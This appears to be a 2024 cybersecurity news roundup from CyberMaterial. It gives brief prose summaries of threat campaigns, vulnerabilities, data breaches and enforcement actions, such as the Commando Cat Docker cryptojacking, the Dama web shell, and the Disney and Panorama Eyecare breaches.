π What are the latest cybersecurity alerts, incidents, and news?
Commando Cat, Docker, Cryptocurrency, ThinkPHP, Dama Web Shell, EmailGPT Vulnerability, SickSync, Cisco Finesse, Stored XSS Attacks, Gitloker, GitHub Repositories, Dutch Political Sites, Cloudflare, Panorama Eyecare, Office of the Maine General Attorney, Disney Server Breach, Club Penguin, Gizmodo, Bimbo Bakeries, Department of Justice, Interpol, FBI, Red Notice Sabotage, Associated Press, Microsoft, NTLM, Enhanced Security, Guardian Analytics, Webster Bank, Bloomberg, ‘Evolved Apes’, NFT Fraud, Attorney General, Southern District of New York
Listen to the full podcast
π¨Β Cyber Alerts
The threat actor known as Commando Cat has been identified in an ongoing cryptojacking campaign targeting poorly secured Docker instances. Researchers from Trend Micro, Sunil Bharti and Shubham Singh, revealed that the attackers use a Docker image container named cmd.cat/chattr, which retrieves the malicious payload from their command-and-control (C&C) infrastructure. This Docker image is then used to instantiate a container, allowing the attackers to break out of its confines using the chroot command and gain access to the host operating system.
Chinese threat actors are exploiting old vulnerabilities in ThinkPHP applications to install a persistent web shell named Dama. This web shell allows for extensive exploitation of breached systems, enabling remote control and further malicious activities. The campaign, first detected in October 2023, has recently intensified, targeting even non-ThinkPHP systems opportunistically.
A critical flaw in EmailGPT (CVE-2024-5184) enables prompt injection, allowing attackers to manipulate the AI service, potentially compromising sensitive data. By exploiting the API service, malicious actors gain control over the logic of the system, paving the way for various forms of exploitation. This vulnerability poses profound implications, from data breaches to denial-of-service attacks, highlighting the urgency for remedial action.
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning regarding a series of cyber attacks directed at the country’s defense forces. These attacks are part of an espionage campaign known as SickSync, involving the deployment of a sophisticated malware called SPECTR. The agency has attributed these attacks to a threat actor identified as UAC-0020, also known as Vermin, believed to have ties with security agencies of the Luhansk People’s Republic (LPR).
Cisco has identified vulnerabilities within its Finesse platform that expose users to the risk of stored cross-site scripting (XSS) attacks. These vulnerabilities, designated CVE-2024-20404 and CVE-2024-20405, allow attackers to inject malicious scripts into web pages accessed through the Cisco Finesse web interface. The exploitation of these vulnerabilities could lead to unauthorized access, data theft, or manipulation of sensitive information.
π₯ Cyber Incidents
Attackers are wiping GitHub repositories and instructing victims to contact them on Telegram for further information. The campaign, discovered by security researcher GermΓ‘n FernΓ‘ndez, likely involves compromising GitHub accounts with stolen credentials. The attackers claim to have stolen the victims’ data, offering a backup in exchange for contact on Telegram.
Cloudflare detects DDoS attacks targeting Dutch political websites during the 2024 European Parliament election. These attacks coincide with the absence of the UK in the first European election post-Brexit. HackNeT, a pro-Russian hacker group, claims responsibility for targeting political party websites in the Netherlands.
Panorama Eyecare, a physician-led management services organization in Fort Collins, CO, has disclosed a significant data breach affecting 377,911 individuals, a year following a ransomware attack. The breach, attributed to the LockBit ransomware group, compromised sensitive data, including names, Social Security numbers, dates of birth, driverβs license numbers/state IDs, financial account information, dates of service, and medical provider names.
Threat actors infiltrated Disney’s servers seeking old Club Penguin data but made off with 2.5 GB of current internal information, including details on Disney+ and corporate strategies. Despite Disney’s silence, leaked documents expose tools like Helios and Communicore, potentially jeopardizing the company’s security. The breach highlights ongoing frustration among Club Penguin fans after its closure in 2017.
On February 13, 2024, Bimbo Bakeries discovered unauthorized access to its network, including servers containing personal information. While names, Social Security numbers, and dates of birth were compromised, financial and credit card data remained secure. Bimbo Bakeries swiftly blocked access, initiated investigations, and engaged cybersecurity experts to mitigate the breach and safeguard affected individuals’ information.
π’ Cyber News
A civil forfeiture action aims to recoup $5.3 million lost in a Massachusetts workers union BEC scam. Cybercriminals impersonated a trusted investment consulting firm via spoofed email, directing the union to transfer funds. Authorities traced $5.3 million to seized bank accounts, part of a larger effort to combat BEC fraud nationwide.
Interpol and FBI joined forces, detaining four in Moldova, disrupting a scheme targeting Red Notices, crucial for global law enforcement. The operation exposed an intricate network spanning Russia, Ukraine, and Belarus, aiming to undermine international justice through bribes and corruption. Interpol vows to safeguard its systems against further misuse, emphasizing the ongoing fight against global corruption.
Microsoft announces the gradual retirement of all NTLM versions to bolster Windows security against evolving threats. Developers are advised to replace NTLM calls with Negotiate, a security package primarily utilizing Kerberos for enhanced protection. System administrators should conduct thorough audits and plan for a smooth transition to Negotiate, ensuring compatibility with future Windows updates.
Guardian Analytics and Webster Bank settle $1.4M data breach lawsuit, addressing inadequate data protection. The breach exposed 192,000 individuals, leading to accusations of insufficient safeguarding of sensitive information. The agreement compensates for financial losses and underscores the critical need for robust cybersecurity measures.
Three UK nationals face charges for their role in the “Evolved Apes” NFT scam, accused of wire fraud and money laundering by orchestrating a rug pull scheme. The trio’s alleged actions involved falsely promising a video game development linked to NFT sales, ultimately vanishing with investors’ funds. The indictment reveals their laundering of misappropriated funds through cryptocurrency transactions, highlighting the serious consequences of NFT fraud in the digital art market.
Copyright Β© 2024 CyberMaterial. All Rights Reserved.